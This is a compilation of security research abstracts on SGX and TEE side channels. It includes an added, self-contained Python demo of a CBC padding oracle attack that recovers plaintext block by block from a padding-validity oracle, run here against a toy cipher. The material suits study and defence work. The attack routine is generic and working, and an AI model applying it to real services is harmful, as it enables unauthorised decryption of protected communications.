Stacco: Differentially Analyzing Side-Channel Traces for Detecting SSL/TLS Vulnerabilities in Secure Enclaves
Intel Software Guard Extensions (SGX) offers software applications enclaves that
protect their confidentiality and integrity from a malicious operating system.
The SSL/TLS protocol, the de facto standard for protecting transport-layer
network communications, is broadly deployed to provide a secure communication
channel. In this paper, however, we show that the marriage between SGX and SSL
may not be smooth sailing.
Particularly, we consider a category of side-channel attacks against SSL/TLS
implementations in secure enclaves, which we call the control-flow inference
attacks. In these attacks, the malicious operating system kernel may perform a
powerful man-in-the-kernel attack to collect execution traces of the enclave
programs at page, cacheline, or branch level, while positioning itself in the
middle of the two communicating parties. At the center of our work is a
differential analysis framework, dubbed Stacco, to dynamically analyze the
SSL/TLS implementations and detect vulnerabilities that can be exploited as
decryption oracles. Surprisingly, we found exploitable vulnerabilities in the
latest versions of all the SSL/TLS libraries we have examined.
To validate the detected vulnerabilities, we developed a man-in-the-kernel
adversary to demonstrate Bleichenbacher attacks against the latest OpenSSL
library running in the SGX enclave (with the help of Graphene) and completely
broke the PreMasterSecret encrypted by a 4096-bit RSA public key with only
57286 queries. We also conducted CBC padding oracle attacks against the latest
GnuTLS running in Graphene-SGX and an open-source SGX-implementation of mbedTLS
(i.e., mbedTLS-SGX) that runs directly inside the enclave, and showed that it
only needs 48388 and 25717 queries, respectively, to break one block of AES
ciphertext. Empirical evaluation suggests these man-in-the-kernel attacks can
be completed within 1 or 2 hours.
Comment: CCS 17, October 30-November 3, 2017, Dallas, TX, US
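The CBC padding oracle attack the abstract reports against GnuTLS and mbedTLS-SGX, as an added worked example; this is not Stacco code nor code from the paper. It assumes a constructed 16-byte-block Feistel cipher keyed through SHA-256 standing in for AES (so the script needs only the Python standard library); the attack itself is cipher-agnostic and needs nothing but an oracle that answers "was the padding valid?", which is the bit a leaked control-flow trace of the padding check gives the man-in-the-kernel adversary. All key, IV and message values are constructed for the demo.

```python
import hashlib

BLOCK = 16      # block size in bytes (as for AES)
ROUNDS = 8      # rounds of the constructed Feistel cipher standing in for AES

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round_fn(key: bytes, r: int, half: bytes) -> bytes:
    # keyed, round-dependent PRF; a stand-in so the script needs only the stdlib
    return hashlib.sha256(key + bytes([r]) + half).digest()[:BLOCK // 2]

def block_encrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for r in range(ROUNDS):
        left, right = right, _xor(left, _round_fn(key, r, right))
    return right + left          # undo the final swap so decrypt mirrors encrypt

def block_decrypt(key: bytes, block: bytes) -> bytes:
    right, left = block[:BLOCK // 2], block[BLOCK // 2:]
    for r in reversed(range(ROUNDS)):
        left, right = _xor(right, _round_fn(key, r, left)), left
    return left + right

def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    padded, out, prev = pkcs7_pad(plaintext), [], iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        blk = ciphertext[i:i + BLOCK]
        out.append(_xor(block_decrypt(key, blk), prev))
        prev = blk
    return pkcs7_unpad(b"".join(out))

def make_padding_oracle(key: bytes):
    """The modelled leak: the victim reveals only whether the padding was valid.
    In the paper that bit is read from the enclave's control flow; here it is returned."""
    def oracle(iv: bytes, ciphertext: bytes) -> bool:
        try:
            cbc_decrypt(key, iv, ciphertext)
            return True
        except ValueError:
            return False
    return oracle

def recover_block(oracle, prev: bytes, target: bytes):
    """Recover target's plaintext from the block before it; returns (plaintext, queries)."""
    intermediate = bytearray(BLOCK)   # block_decrypt(key, target), learned byte by byte
    queries = 0
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = intermediate[j] ^ pad     # make known bytes decrypt to `pad`
        for guess in range(256):
            forged[pos] = guess
            queries += 1
            if not oracle(bytes(forged), target):
                continue
            if pos == BLOCK - 1:
                # a last-byte hit may be a longer pad (02 02, ...): disturb the byte
                # to its left and keep the hit only if it survives
                probe = bytearray(forged)
                probe[pos - 1] ^= 0xFF
                queries += 1
                if not oracle(bytes(probe), target):
                    continue
            intermediate[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("no guess gave valid padding; not a padding oracle?")
    return _xor(bytes(intermediate), prev), queries

def padding_oracle_attack(oracle, iv: bytes, ciphertext: bytes):
    """Decrypt a whole CBC message block by block from iv||ciphertext and the oracle."""
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plaintext, total = b"", 0
    for prev, target in zip(blocks, blocks[1:]):
        block_pt, q = recover_block(oracle, prev, target)
        plaintext, total = plaintext + block_pt, total + q
    return pkcs7_unpad(plaintext), total

if __name__ == "__main__":                   # constructed demo run
    key, iv = b"constructed-key!", bytes(range(BLOCK))
    ct = cbc_encrypt(key, iv, b"PreMasterSecret stand-in: constructed demo data")
    print(padding_oracle_attack(make_padding_oracle(key), iv, ct))
```

With a clean yes/no oracle each byte costs at most 256 queries, so a 16-byte block falls in at most about 4,096 queries (the demo prints the exact count). The 48388 and 25717 per-block queries in the abstract are measured against an oracle reconstructed from page, cacheline or branch traces of the padding check rather than this clean one; the attack logic is the same, what differs is the oracle behind it.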
Trusted execution environments leveraging reconfigurable FPGA technology
Compartmentalization techniques like Trusted
Execution Environments (TEEs) are a well-established security
strategy to provide increasing integrity and confidentiality for
applications, from the edge to the cloud. TEEs are used to protect
sensitive data and run security-critical applications on secure
execution environments, isolated from the rest of the system.
Nevertheless, over the last few years TEEs have repeatedly been shown
to be weak: both TEEs built on security-oriented hardware
extensions (Arm TrustZone, Intel SGX) and those relying on dedicated
secure elements have been exploited multiple times. We present and
discuss a novel TEE design that leverages reconfigurable FPGA
technology. The main novelty lies in using the
programmable logic (PL) to create secure enclaves by instantiating
a customized, dedicated security processor per application, on
demand. Unlike other TEE designs, our approach can
provide high-bandwidth connections and physical on-chip
isolation. We present a proof-of-concept (PoC) implementation
targeting a Xilinx Zynq Ultrascale+ based platform and we detail
how our design is interoperable with existing TEE stacks and
compliant with the GlobalPlatform specification. To demonstrate
the practicability of our approach in real-world applications, we
run a legacy open-source bitcoin wallet.
This work has been supported by FCT - Fundação para a Ciência e Tecnologia (FCT) within the R&D Units Project Scope UIDB/00319/2020 and grant SFRH/BD/145209/2019
Software Grand Exposure: SGX Cache Attacks Are Practical
Side-channel information leakage is a known limitation of SGX. Researchers
have demonstrated that secret-dependent information can be extracted from
enclave execution through page-fault access patterns. Consequently, various
recent research efforts are actively seeking countermeasures to SGX
side-channel attacks. It is widely assumed that SGX may be vulnerable to other
side channels, such as cache access pattern monitoring, as well. However, prior
to our work, the practicality and the extent of such information leakage had
not been studied.
In this paper we demonstrate that cache-based attacks are indeed a serious
threat to the confidentiality of SGX-protected programs. Our goal was to design
an attack that is hard to mitigate using known defenses, and therefore we mount
our attack without interrupting enclave execution. This approach has major
technical challenges, since the existing cache monitoring techniques experience
significant noise if the victim process is not interrupted. We designed and
implemented novel attack techniques to reduce this noise by leveraging the
capabilities of the privileged adversary. Our attacks are able to recover
confidential information from SGX enclaves, which we illustrate in two example
cases: extraction of an entire RSA-2048 key during RSA decryption, and
detection of specific human genome sequences during genomic indexing. We show
that our attacks are more effective than previous cache attacks and harder to
mitigate than previous SGX side-channel attacks.